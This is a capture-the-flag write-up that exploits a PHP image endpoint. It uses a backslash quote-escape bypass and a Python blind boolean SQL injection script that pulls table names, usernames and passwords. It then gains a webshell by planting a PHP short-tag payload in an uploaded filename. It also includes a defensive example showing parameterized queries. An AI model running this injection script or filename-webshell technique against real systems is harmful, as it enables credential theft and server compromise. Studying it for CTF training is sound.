From robots.txt we find that there should be a backup file,
Looking at the page source there is
Opening image.php.bak gives the source file, and there is an id parameter after php, so there may be SQL injection.
<?php
include "config.php";
$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";
$id=addslashes($id);
$path=addslashes($path);
$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);
$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);
$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);
Auditing the source, two parameters are read in total, id and path, and both are filtered here.
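To see what the filter chain above actually hands to mysqli_query, here is an added example (not part of the original writeup) that replays addslashes() and the str_replace() blacklist in Python and contrasts the concatenated query with a bound-parameter query; the sqlite3 table is constructed data standing in for the challenge's MySQL images table.

```python
import re
import sqlite3

# Added example, not from the original writeup: replay the filter chain of
# image.php.bak to see why a backslash survives, then contrast it with a
# bound-parameter query. The sqlite3 table is constructed stand-in data.

def php_addslashes(s: str) -> str:
    """Mimic PHP addslashes(): prefix ' " \\ and NUL with a backslash."""
    return (s.replace("\\", "\\\\")
             .replace("'", "\\'")
             .replace('"', '\\"')
             .replace("\x00", "\\0"))

def php_filter(s: str) -> str:
    """addslashes() followed by the page's sequential str_replace() blacklist."""
    s = php_addslashes(s)
    for bad in ("\\0", "%00", "\\'", "'"):   # same order as the PHP array
        s = s.replace(bad, "")
    return s

def build_query(id_: str, path: str) -> str:
    """The exact SQL string the original code concatenates."""
    return f"select * from images where id='{php_filter(id_)}' or path='{php_filter(path)}'"

def quotes_balanced(sql: str) -> bool:
    """False when the count of unescaped quotes is odd, i.e. a literal was broken out of."""
    return re.sub(r"\\.", "", sql).count("'") % 2 == 0

def safe_lookup(id_: str, path: str):
    """Hardened variant: parameters are bound, so no blacklist is needed at all."""
    con = sqlite3.connect(":memory:")
    con.execute("create table images(id text, path text)")
    con.execute("insert into images values ('1', '1.jpg')")   # constructed row
    row = con.execute("select path from images where id=? or path=?",
                      (id_, path)).fetchone()
    con.close()
    return row[0] if row else None

if __name__ == "__main__":
    # Backslash + '0' survives as a lone backslash: addslashes doubles it to \\0,
    # str_replace strips the \0 part, and the remaining \ escapes the closing quote.
    print(repr(php_filter("\\0")))                     # '\\'
    print(build_query("\\0", "x"))                     # ... id='\' or path='x'
    print(quotes_balanced(build_query("\\0", "x")))    # False
    print(quotes_balanced(build_query("1", "x")))      # True
    print(safe_lookup("\\0", "x"))                     # None
```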
import requests

url = "http://28a7dd21-a562-43c0-9ea7-7e58787b89b9.node3.buuoj.cn/image.php"
# enumerate tables
payload1 = "?id=\\0&path=or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{}%23"
# enumerate columns
payload2 = "?id=\\0&path=or ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),{},1))>{}%23"
# read the username
payload3 = "?id=\\0&path=or ascii(substr((select group_concat(username) from users),{},1))>{}%23"
# read the password
payload4 = "?id=\\0&path=or ascii(substr((select group_concat(password) from users),{},1))>{}%23"

result = ""
for i in range(1, 10000):
    # binary search over the printable ASCII range for character i
    low = 32
    high = 128
    mid = (low + high) >> 1
    while low < high:
        #payload = payload1.format(i, mid) # images,users
        #payload = payload2.format(i, mid) # username, password
        #payload = payload3.format(i, mid) # admin
        payload = payload4.format(i, mid) # dc268983c380339547ce
        new_url = url + payload
        response = requests.get(new_url)
        if "JFIF" in response.text:   # a JPEG came back, so the comparison was true
            low = mid + 1
        else:
            high = mid
        mid = (low + high) >> 1
    if mid == 32 or mid == 128:   # no character at this position: end of the string
        break
    result += chr(mid)
    print(result)
After obtaining the username and password we log in, and after logging in we find it is a
I uploaded an image webshell, and it showed
We can see that the uploaded content is recorded in a log.php; open this php file to take a look,
The uploaded filename is written into this php file, so if we write our payload into the filename it ends up in this php file and we can connect with AntSword. The filename is filtered with php/i, so a short-tag bypass can be considered,
Go to the root directory and read the flag.